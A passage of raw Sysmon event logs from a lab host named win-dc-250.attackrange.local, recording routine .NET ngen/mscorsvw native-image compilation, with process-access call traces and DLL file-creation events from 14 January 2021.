13:25:49.838{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465D-6000-2D04-000000009A01}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008293Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:49.760{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465D-6000-2C04-000000009A01}3064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008292Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:49.744{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-465D-6000-2C04-000000009A01}3064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008291Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:49.744{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465D-6000-2C04-000000009A01}3064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008290Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:49.681{08A6967A-465D-6000-2B04-000000009A01}4960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1360-0\PresentationFramework.Classic.dll2021-01-14 13:25:49.681 10341000x80000000000000008289Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:49.494{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465D-6000-2B04-000000009A01}4960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008288Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:49.478{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-465D-6000-2B04-000000009A01}4960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008287Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:49.478{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465D-6000-2B04-000000009A01}4960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008286Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:49.416{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465D-6000-2A04-000000009A01}860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008285Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:49.400{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-465D-6000-2A04-000000009A01}860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008284Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:49.400{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465D-6000-2A04-000000009A01}860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008283Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:49.338{08A6967A-465D-6000-2904-000000009A01}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\2ec-0\PresentationFramework.AeroLite.dll2021-01-14 13:25:49.338 10341000x80000000000000008282Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:49.213{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465D-6000-2904-000000009A01}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008281Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:49.197{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-465D-6000-2904-000000009A01}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008280Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:49.197{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465D-6000-2904-000000009A01}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008279Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:49.134{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465D-6000-2804-000000009A01}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008278Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:49.119{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-465D-6000-2804-000000009A01}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008277Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:49.119{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465D-6000-2804-000000009A01}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008276Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:49.041{08A6967A-465C-6000-2704-000000009A01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1348-0\PresentationFramework.Aero.dll2021-01-14 13:25:49.041 10341000x80000000000000008310Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:50.775{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465E-6000-3104-000000009A01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008309Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:50.760{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-465E-6000-3104-000000009A01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008308Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:50.760{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465E-6000-3104-000000009A01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008307Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:50.603{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465E-6000-3004-000000009A01}4340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008306Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:50.588{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-465E-6000-3004-000000009A01}4340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008305Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:50.588{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465E-6000-3004-000000009A01}4340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008304Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:50.525{08A6967A-465E-6000-2F04-000000009A01}4172C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\104c-0\PresentationFramework.Royale.dll2021-01-14 13:25:50.525 10341000x80000000000000008303Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 